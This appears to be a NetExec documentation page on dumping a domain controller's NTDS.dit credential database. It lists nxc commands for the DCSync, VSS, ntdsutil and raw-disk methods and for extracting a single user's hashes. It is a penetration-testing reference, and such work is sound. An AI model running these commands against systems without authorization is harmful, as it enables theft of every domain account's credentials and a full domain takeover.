Dump NTDS.dit

Dump the NTDS.dit from target DC using methods from secretsdump.py

{% hint style="danger" %}
Requires Domain Admin or Local Admin Priviledges on target Domain Controller
{% endhint %}

2 methods are available:   
(default)   drsuapi -  Uses drsuapi RPC interface create a handle, trigger replication, and combined with   
                        additional drsuapi calls to convert the resultant linked-lists into readable format  
            vss - Uses the Volume Shadow copy Service  

Dump all users from the NTDS.dit

nxc smb <target> -u <username> -p <password> --ntds
nxc smb <target> -u <username> -p <password> --ntds --enabled
nxc smb <target> -u <username> -p <password> --ntds vss

{% hint style="info" %}
You can also DCSYNC with the computer account of the DC
{% endhint %}

Dump a specific user only

nxc smb <target> -u <username> -p <password> --ntds --user Administrator

{% hint style="warning" %}
In environments with multiple domains (e.g., parent/child), make sure to specify the full NetBIOS format when using --user, such as: --user NETBIOS/Administrator. This avoids ambiguity when the same username exists in different domains.
{% endhint %}

Dump NTDS using ntdsutil

There is also the ntdsutil module that will use ntdsutil to dump NTDS.dit and SYSTEM hive and parse them locally with secretsdump.py

nxc smb <target> -u <username> -p <password> -M ntdsutil

Dump NTDS using raw disk access

The ntds-dump-raw module will use raw disk access to extract NTDS.dit and SYSTEM hive by reading directly from the physical drive and parse them locally with secretsdump.py

nxc smb <target> -u <username> -p <password> -M ntds-dump-raw -o TARGET=NTDS

{% hint style="warning" %}
If you are encountering command execution errors, specify an alternative execution method such as --exec-method wmiexec or --exec-method atexec
{% endhint %}